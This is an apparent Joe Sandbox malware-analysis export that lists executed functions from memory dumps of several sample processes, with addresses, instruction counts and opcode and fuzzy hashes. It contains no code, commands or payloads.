                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: b6b10bd4a8ef1bf12007b0086fd591c9700fa20bce66c1c0c6d8702113cc0d71
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 10B01200E5640F00A494337E0CD206470409F87100FC30070E61CC0081A84D10942242
                                                                                                                  Function 00007FFD34883A25 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9de2cb9049ecf17efa582cc69677d96a7356e3dd4f836b216ab719e2a342ba91
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: ABC02B10E4800600F3A4573044601FD71414F13300F07C071801ED6480DE2C16043340

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD348A0D78 Relevance: .3, Instructions: 255COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5d4d45ebe691649f9fa2e4a6dd9be3271dcb1010cd1d8b4c8a27ea7844ad097e
                                                                                                                  • Instruction ID: 5bb31062e504e5e50d5eaa58d9e8743755b5195685c9eee68c74d802ea4b32ea
                                                                                                                  • Opcode Fuzzy Hash: 5d4d45ebe691649f9fa2e4a6dd9be3271dcb1010cd1d8b4c8a27ea7844ad097e
                                                                                                                  • Instruction Fuzzy Hash: D791D275A18A9A4FE799DFA888793A97FE1FF96350F0400BED04DD72D2CAB82414C750
                                                                                                                  Function 00007FFD348A090D Relevance: .2, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f1a2664cda98d1b40becd8997e086036f7543311aa66d7a375fd3154327c5c8a
                                                                                                                  • Instruction ID: 84935762257fbb15523366ace6067e73a856dbc38be2c2a5e529d3b0af408180
                                                                                                                  • Opcode Fuzzy Hash: f1a2664cda98d1b40becd8997e086036f7543311aa66d7a375fd3154327c5c8a
                                                                                                                  • Instruction Fuzzy Hash: CC410312B0CA590FE755B7BCA0B66F97BD5DF4A320B1804BFD14EC7193DD68A8818284
                                                                                                                  Function 00007FFD348A08E8 Relevance: .1, Instructions: 134COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: be3f9b859b6b5279cf48f113a3d6a3359f998b97335d6581c50b5941a8af4771
                                                                                                                  • Instruction ID: 2756a9ae8e137beeb34ae0ed6eba25ccbfdc7a0368ce5ee4e04221488609f2fd
                                                                                                                  • Opcode Fuzzy Hash: be3f9b859b6b5279cf48f113a3d6a3359f998b97335d6581c50b5941a8af4771
                                                                                                                  • Instruction Fuzzy Hash: C131253170D9184FE768EB5CE89A9B977D0EF4A32030505BBE58AC7166E961EC8287C1
                                                                                                                  Function 00007FFD348A0960 Relevance: .1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 441abf1934c71a1812d79e239cd28f90e9222cd91a7e6c8f318e68eb5e9415be
                                                                                                                  • Instruction ID: af181a84c5ea5f09a60597aa63bfde4874190694f5a80e8924da3d3da96c1a44
                                                                                                                  • Opcode Fuzzy Hash: 441abf1934c71a1812d79e239cd28f90e9222cd91a7e6c8f318e68eb5e9415be
                                                                                                                  • Instruction Fuzzy Hash: BD31D311B1C9591FE7A8B7AC64A66F963C5DF89321B18447AE40DC32D3DD68AC814294
                                                                                                                  Function 00007FFD348A119D Relevance: .1, Instructions: 93COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bfc1cb428e92958f79e82b44bb5e1fcc55da2f45d62a1480423532f2eb3b4b9
                                                                                                                  • Instruction ID: 7c51a6f452c8394717485da55ab1a70cc52a79e5cfc80bbdfebe116c814d593e
                                                                                                                  • Opcode Fuzzy Hash: 3bfc1cb428e92958f79e82b44bb5e1fcc55da2f45d62a1480423532f2eb3b4b9
                                                                                                                  • Instruction Fuzzy Hash: EE318431A0D54A8FDB85EB68C8A9AFD7BF0FF56300F0545BAC049D7292DE68A840C750
                                                                                                                  Function 00007FFD348A0998 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9e4a1b12da06ff5981dd3719a65a1bc7b789e8e4561ec7e3fc94ccdf0a1c2414
                                                                                                                  • Instruction ID: 1d948629f8734d831d6cd282295b651a3c7764bcff546160dc7041133475fe7c
                                                                                                                  • Opcode Fuzzy Hash: 9e4a1b12da06ff5981dd3719a65a1bc7b789e8e4561ec7e3fc94ccdf0a1c2414
                                                                                                                  • Instruction Fuzzy Hash: BA212921F19D590FEBD8FB6C94AA6B973C6EB89311F1400BEE40DC32D3DD68AC418290
                                                                                                                  Function 00007FFD348A0C25 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6f08a110cfc4ee5a7af6998259fd7e089a6fbac2ffb5faa3399d85ccb4f5ecd0
                                                                                                                  • Instruction ID: 1e7090767c503a11af82f3c1a007e0902591b347f2507420222b2a957f122cc1
                                                                                                                  • Opcode Fuzzy Hash: 6f08a110cfc4ee5a7af6998259fd7e089a6fbac2ffb5faa3399d85ccb4f5ecd0
                                                                                                                  • Instruction Fuzzy Hash: 5521F336A0E6898FE712DB7898A12DD7FA0EF43320F1445B7C244CB182D538260A9791
                                                                                                                  Function 00007FFD348A0C38 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ae443ae44a474706d0cfc49d7ba00d0630a9aa20d7c5437acbd0ecc0e8f381d5
                                                                                                                  • Instruction ID: c1e908997704df5f15163db322e9dbfd8ac0f324fb27565aba424c69625a0828
                                                                                                                  • Opcode Fuzzy Hash: ae443ae44a474706d0cfc49d7ba00d0630a9aa20d7c5437acbd0ecc0e8f381d5
                                                                                                                  • Instruction Fuzzy Hash: 0111A035A0E7898FE702DBB888A129D7FB0EF43310F0545B6C284DB193D57856099791
                                                                                                                  Function 00007FFD348A0C40 Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 08f7dc5fb1e94cf98329d605dbdac5aeffe3e68788f105adc5162c9d925a06db
                                                                                                                  • Instruction ID: b4844c8d26485b55045ab1078c186b4691c30b15c41dc6315e048d3f11d523ac
                                                                                                                  • Opcode Fuzzy Hash: 08f7dc5fb1e94cf98329d605dbdac5aeffe3e68788f105adc5162c9d925a06db
                                                                                                                  • Instruction Fuzzy Hash: E911AD35A0E7888FE702DFB888A029D7FB0EF43310F0545FAC184DB192D67866499791
                                                                                                                  Function 00007FFD348A0C48 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ac466752a9c031af13998586b7395b470218c410ba96c7b1c16387b686f38d6f
                                                                                                                  • Instruction ID: be34c56d07ac4c50b98e5d2120c62f92e8ef004e35804d87913651b083c31841
                                                                                                                  • Opcode Fuzzy Hash: ac466752a9c031af13998586b7395b470218c410ba96c7b1c16387b686f38d6f
                                                                                                                  • Instruction Fuzzy Hash: 36019E35A0E3889FD702DFB8C8A029D7FB0AF03310F1945EAC140DB192D67866449791
                                                                                                                  Function 00007FFD348A0C50 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: da58bd1c288aa3e9e50396c3b9e97b0912a402c90f58a9b77fe241fd52526005
                                                                                                                  • Instruction ID: 5ab5e48dfc1ea3b30e64134cb9c4e9fd42f3fa2c10389fe0d8a8c809058684c5
                                                                                                                  • Opcode Fuzzy Hash: da58bd1c288aa3e9e50396c3b9e97b0912a402c90f58a9b77fe241fd52526005
                                                                                                                  • Instruction Fuzzy Hash: 57018F34E0E3899FE712DBB888A429D7FF0AF03310F1845EAC544DB193DA7856449791
                                                                                                                  Function 00007FFD348A3FBF Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cad59880ea2838d87f4fd587b782959201c0110e635fecbd24ba9d03d9e2b10e
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: A3E01230B094164BF7959B54C4A07B962A1EB8A340F141078DB5DD33D5CF7CAD009755
                                                                                                                  Function 00007FFD348A12E8 Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: 3276c49e548a53cd1e4f0de83272f49a2a4426b800ddd0947254fd997842c080
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 60C012306118088FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D66AECC2DB81
                                                                                                                  Function 00007FFD348A0B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 669f3a9db257c8a8ed837e302ad47010a3f241670bae4078e87893dc875bb850
                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: 23C01230A2980E8FDA80BB28C888924BBA0FF0E301BE908E0E00CC71A1D65998908B01
                                                                                                                  Function 00007FFD348A06AD Relevance: .0, Instructions: 13COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: 2499b4f497855eefc6a1a00a3e0b237b2b6b9dd9fe9607a65606e68cca8249bd
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: CEC04C05F5B65B01A9D53B6E58E60ADA1405BC7728FDD1572D74CD0091ACCD20D92277
                                                                                                                  Function 00007FFD348A3CD0 Relevance: .0, Instructions: 10COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 64a4fa156b586ef5c550b65d48d754df306a9a68d2d9de359464c8738863758c
                                                                                                                  • Instruction ID: 66ef3c52c56ccbaddd40eb7248f9fb90daca9ba01bfdcfa2608c912f4bbac0f7
                                                                                                                  • Opcode Fuzzy Hash: 64a4fa156b586ef5c550b65d48d754df306a9a68d2d9de359464c8738863758c
                                                                                                                  • Instruction Fuzzy Hash: D9C08C01F18C2A02E369274400311FE08424F50300F541430E00DC33CACF2C2E0102C2
                                                                                                                  Function 00007FFD348A06D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: 5c9538717dfbb204b014aa22264d4be7daafa63e35016c887e7dd86aa84dcd2d
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 04B01200E6740F00A48437BE08D206470405B47200FC91070D70CC0081A8CD20982363
                                                                                                                  Function 00007FFD348A3A25 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9f7ed78d4ab93ff93b1e56f4d5d14cab7e19abe966447f83afdbe8aa09ba3898
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: E6C02B10E0901600E3A4473044601FDB1404F03300F06C071402ED6480DE2C17043340

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD348B0B16 Relevance: 2.0, Instructions: 1952COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bb5301db1a6a85fd0fe853f0194b1b2fda8124b0a8f200a8af12be15ae795e3
                                                                                                                  • Instruction ID: 48126af7c2b127f3b4de73e87cb296fd586bac806c737473620c77f6689b2bb5
                                                                                                                  • Opcode Fuzzy Hash: 3bb5301db1a6a85fd0fe853f0194b1b2fda8124b0a8f200a8af12be15ae795e3
                                                                                                                  • Instruction Fuzzy Hash: F0D2A121B1891A4FEB99EB1884B57B873D2FF99300F1445B9D10ED72C6DE78BC829781
                                                                                                                  Function 00007FFD348B178E Relevance: 1.3, Instructions: 1301COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2e478bdd72c732a63940f64949adf4744abf69e2ae0b56d3a44916676e5ad862
                                                                                                                  • Instruction ID: 911e1a75126eae0d79da1d47fca4e499525f48cdf8070357627d10e171a95023
                                                                                                                  • Opcode Fuzzy Hash: 2e478bdd72c732a63940f64949adf4744abf69e2ae0b56d3a44916676e5ad862
                                                                                                                  • Instruction Fuzzy Hash: AC92A221B1891A4FEB98EB5884B56B873D1FF9A300F1445B9D14ED72C3DE78BC829781
                                                                                                                  Function 00007FFD348B10A9 Relevance: 1.2, Instructions: 1151COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 14b17faa47edd4571294b5532141f35b1b7cccec3db54f8a8ac319c2f1d6ef7a
                                                                                                                  • Instruction ID: fd0f3c98fbc03e5b22aeb078793f3612e94cd39d3be163f96885c95a024e9bf0
                                                                                                                  • Opcode Fuzzy Hash: 14b17faa47edd4571294b5532141f35b1b7cccec3db54f8a8ac319c2f1d6ef7a
                                                                                                                  • Instruction Fuzzy Hash: A182A221B1891A4FEB98EB1884B57B973E2FF99340F1445B9D10ED72C2DD78BC829781
                                                                                                                  Function 00007FFD348A0D78 Relevance: .3, Instructions: 256COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1bc41d8f209e93589cd3a94b12b3ef2fcb43dcb142be5eb412ff93aee94c71b9
                                                                                                                  • Instruction ID: 0c578107ed422e8e538aa5d4d95ca607b71c69aaa4923f478d29465b14fd6f12
                                                                                                                  • Opcode Fuzzy Hash: 1bc41d8f209e93589cd3a94b12b3ef2fcb43dcb142be5eb412ff93aee94c71b9
                                                                                                                  • Instruction Fuzzy Hash: 0E91D275A18A994FEB89DFA888793A97FE1FF97310F0400BED149D72D2CA782415C750
                                                                                                                  Function 00007FFD348C5A75 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 7e9cad57eee0f1ffe39d6adf5631bcd2010e2e51175f648c9ca7564d46c27280
                                                                                                                  • Instruction ID: 6a6cd3ec0bffaf50c1e1cabc471e014736e4779f70dc6f6a8c52b235ff86b736
                                                                                                                  • Opcode Fuzzy Hash: 7e9cad57eee0f1ffe39d6adf5631bcd2010e2e51175f648c9ca7564d46c27280
                                                                                                                  • Instruction Fuzzy Hash: 6501DB30B1EA560FDB95E33944E55A8B7D1EF9721074401BAC54DC7192ED5CDC828381
                                                                                                                  Function 00007FFD348C5999 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 8b5e28a268e1434c06637b6e34f0fa308cd40fe5ec2c2b7039152b4a5d08dca6
                                                                                                                  • Instruction ID: 63519dcbea4b694f083531692e1780d1b2f7fbe19ad696a86bd0f2fbe21308c4
                                                                                                                  • Opcode Fuzzy Hash: 8b5e28a268e1434c06637b6e34f0fa308cd40fe5ec2c2b7039152b4a5d08dca6
                                                                                                                  • Instruction Fuzzy Hash: 68F0203194E2D00FCF469A3884A44E0BFB0EF5B22074950EAC08ACF093EA19888BC741
                                                                                                                  Function 00007FFD348B3C19 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 056a8d99e83b1ef129f68035a25e89a941c461ffa59e2f977a44528da9eb4bfc
                                                                                                                  • Instruction ID: fc85d845d73ea144925c22543b71ca5a86f863183cbbdca9d9658e49eb6845fa
                                                                                                                  • Opcode Fuzzy Hash: 056a8d99e83b1ef129f68035a25e89a941c461ffa59e2f977a44528da9eb4bfc
                                                                                                                  • Instruction Fuzzy Hash: 0FF02271A0E3C04FCB16AA3488694487FA0EF6721074A11EEC046CF1E3EE2CC886C701
                                                                                                                  Function 00007FFD348C5A09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
